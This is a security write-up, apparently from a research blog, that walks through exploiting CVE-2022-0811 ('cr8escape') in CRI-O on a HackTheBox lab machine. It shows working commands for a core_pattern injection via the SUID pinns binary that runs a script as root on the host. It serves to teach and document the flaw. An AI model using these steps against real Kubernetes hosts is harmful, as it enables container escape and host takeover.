CVE-2022-0811

CVE-2022-0811 is a vulnerability in CRI-O (a container runtime engine underpinning Kubernetes). Dubbed "cr8escape," this flaw enables attackers to escape from a Kubernetes container and gain root access to the host and move anywhere in the cluster. The vulnerability can facilitate malware execution, data exfiltration, and lateral movement across pods.

Proof-of-Concept

This section documents exploiting CVE-2022-0811 on the HackTheBox machine 'Vessel'.

Prerequisites

The /usr/bin/pinns binary must have the SUID bit set:

N/ABASH
ethan@vessel:/$ ls -al /usr/bin/pinns
-rwsr-x--- 1 root ethan 814936 Mar 15 18:18 /usr/bin/pinns

CRI-O version 1.19 is vulnerable:

N/ABASH
ethan@vessel:/$ crio --version
crio version 1.19.6
Version:       1.19.6
GitCommit:     c12bb210e9888cf6160134c7e636ee952c45c05a
GitTreeState:  clean
BuildDate:     2022-03-15T18:18:24Z
GoVersion:     go1.15.2
Compiler:      gc
Platform:      linux/amd64
Linkmode:      dynamic

Exploitation Steps

Step 1: Create a Container

N/ABASH
## Create location for runc filesystem
ethan@vessel:/$ mkdir /tmp/pthree
ethan@vessel:/$ mkdir /tmp/pthree/rootfs
 
## Create runc configuration
ethan@vessel:/tmp/pthree$ runc spec --rootless
 
## Add following data under 'mounts' section of config.json
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},
 
## Start runc
ethan@vessel:/tmp/pthree$ runc run privesc
 
root@runc:/# hostname
runc

Step 2: Create and Execute Exploit Script

Create a proof-of-concept script:

N/ABASH
ethan@vessel:/tmp$ cat poc 
#!/bin/sh
whoami && hostname >> /tmp/out

Run the malicious pinns command:

N/ABASH
ethan@vessel:/tmp$ /usr/bin/pinns -d /tmp/pthree -f privesc -s 'kernel.shm_rmid_forced=1+kernel.core_pattern=|/tmp/poc #'--ipc --net --uts

Verify that namespaces are created:

N/ABASH
# ls -al /tmp/pthree
total 24
drwxrwxr-x  5 root   root    4096 Sep  2 09:07 .
drwxrwxrwt 17 nobody nogroup 4096 Sep  2 09:03 ..
-rw-rw-r--  1 root   root    2893 Sep  2 08:59 config.json
drwxr-xr-x  2 nobody root    4096 Sep  2 09:07 netns
drwxrwxr-x  2 root   root    4096 Sep  2 08:58 rootfs
drwxr-xr-x  2 nobody root    4096 Sep  2 09:07 utsns

Step 3: Trigger Core Dump

In the runc container, trigger a segmentation fault to execute the script:

N/ABASH
root@runc:/# ulimit -c unlimited
root@runc:/# tail -f /dev/null &
[1] 32
root@runc:/# kill -SIGSEGV 32
root@runc:/# ps
    PID TTY          TIME CMD
      1 pts/0    00:00:00 sh
     18 pts/0    00:00:00 bash
     33 pts/0    00:00:00 ps
[1]+  Segmentation fault      (core dumped) tail -f /dev/null

Step 4: Verify Successful Execution

N/ABASH
ethan@vessel:/tmp/pthree$ cat /tmp/out 
root
vessel

The output confirms the script executed with root privileges on the host system.

Disclaimer

All content published on exploit.se is intended strictly for educational and informational purposes. Research is conducted responsibly under coordinated disclosure principles.

Techniques, tools, and writeups shared on this site are meant to advance the security community's understanding of vulnerabilities and defences. They are not intended to encourage or enable unauthorised access to any system.

The author bears no responsibility for any misuse of information presented here.

Cookie Settings

This site does not use cookies, analytics, or any third-party tracking technologies.

No personal data is collected. No fingerprinting. No ads. You are not the product.


 ██╗ ██████╗ ███████╗██╗███████╗███╗   ██╗██████╗
 ██║██╔═══██╗██╔════╝██║██╔════╝████╗  ██║██╔══██╗
 ██║██║   ██║█████╗  ██║█████╗  ██╔██╗ ██║██║  ██║
 ██║██║   ██║██╔══╝  ██║██╔══╝  ██║╚██╗██║██║  ██║
 ██║╚██████╔╝██║     ██║███████╗██║ ╚████║██████╔╝
 ╚═╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚═╝  ╚═══╝╚═════╝
You found me.
↑↑↓↓←→←→ B A  ·  click to close